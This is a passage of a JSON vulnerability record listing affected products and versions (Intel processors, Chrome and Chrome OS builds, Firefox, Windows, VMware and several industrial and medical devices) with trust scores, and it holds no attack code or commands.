        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4669_v4"
      },
      {
        "_id": null,
        "model": "visunet rm shell",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "pepperl fuchs",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4160t"
      },
      {
        "_id": null,
        "model": "fusion",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "vmware",
        "version": "8.5.9"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5850hq"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5300u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2635qm"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2102"
      },
      {
        "_id": null,
        "model": "xeon e5 2440",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2630l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1285l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4900mq"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4005u"
      },
      {
        "_id": null,
        "model": "el ppc 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6150"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6148f"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4722hq"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2695_v2"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5350u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "670"
      },
      {
        "_id": null,
        "model": "simatic winac rtx \\ 2010",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2010"
      },
      {
        "_id": null,
        "model": "cortex-a76",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1565l_v5"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200u"
      },
      {
        "_id": null,
        "model": "vl bpc 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1275l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 1428l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w3690"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2405s"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3240t"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "680um"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w_v2"
      },
      {
        "_id": null,
        "model": "xeon e3 1230 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2420 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6200u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4402e"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4880_v2"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4890_v2"
      },
      {
        "_id": null,
        "model": "xeon e5 2620 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8867_v3"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7290"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2920"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4150t"
      },
      {
        "_id": null,
        "model": "bl ppc15 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8837"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4590"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6402p"
      },
      {
        "_id": null,
        "model": "core m7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y75"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x7560"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l3406"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7920hq"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2815"
      },
      {
        "_id": null,
        "model": "skynas",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "synology",
        "version": null
      },
      {
        "_id": null,
        "model": "valueline ipc",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4360u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2710qe"
      },
      {
        "_id": null,
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3540"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3540m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2328m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3330s"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8400"
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1515m_v5"
      },
      {
        "_id": null,
        "model": "xeon e3 1270 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680_v4"
      },
      {
        "_id": null,
        "model": "xeon e5 2418l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6144"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "750"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4110m"
      },
      {
        "_id": null,
        "model": "internet explorer",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "11"
      },
      {
        "_id": null,
        "model": "edge",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "0"
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "amd",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "apple",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "dell",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "dell emc",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "fortinet",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "hp",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ibm",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "qualcomm incorporated",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "suse linux",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "synology",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ubuntu",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "vmware",
        "version": null
      },
      {
        "_id": null,
        "model": "windows sp1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "7"
      },
      {
        "_id": null,
        "model": "windows",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "8.1"
      },
      {
        "_id": null,
        "model": null,
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "v8"
      },
      {
        "_id": null,
        "model": "windows",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "10"
      },
      {
        "_id": null,
        "model": "xeon cpu e5-1650",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "intel",
        "version": "v3"
      },
      {
        "_id": null,
        "model": "cortex a57",
        "scope": null,
        "trust": 0.6,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "pro a8-9600 r7",
        "scope": null,
        "trust": 0.6,
        "vendor": "amd",
        "version": null
      },
      {
        "_id": null,
        "model": "compute cores 4c+6g",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "amd",
        "version": "10"
      },
      {
        "_id": null,
        "model": "fx -8320 eight-core processor",
        "scope": null,
        "trust": 0.6,
        "vendor": "amd",
        "version": null
      },
      {
        "_id": null,
        "model": "windows server",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux server year extended update support",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "redhat",
        "version": "-47.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1689.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.924.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1049.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.110.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375127"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.77"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.31"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.3.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.71"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.51"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.117"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.166"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.891.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.15"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.112"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.27"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.306.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1012"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1005.0"
      },
      {
        "_id": null,
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.42"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1039"
      },
      {
        "_id": null,
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.67"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.434.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.702.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1311.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.687.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.155"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.78"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.365.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.879.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.74"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.317.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.92"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.926.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.47255"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.39"
      },
      {
        "_id": null,
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1077.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.366.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.97"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "44.0.2403.157"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.2"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "11.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.530.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.58"
      },
      {
        "_id": null,
        "model": "facsmelody",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.122"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.59"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.366.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.51"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.73"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.2"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.82"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.62"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.87"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1308.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.633.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.105"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.769.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.127"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.785.0"
      },
      {
        "_id": null,
        "model": "pro a8-9600 r7 compute cores 4c+6g",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "amd",
        "version": "100"
      },
      {
        "_id": null,
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1015110"
      },
      {
        "_id": null,
        "model": "facscanto ii clinical",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.60"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.225"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.90"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.11"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.32"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.385.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.319.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.908.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.204"
      },
      {
        "_id": null,
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.366.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.62"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.78"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.219"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.374.0"
      },
      {
        "_id": null,
        "model": "pyxis ecostation system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.23"
      },
      {
        "_id": null,
        "model": "facscanto ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.86"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.40"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1043"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
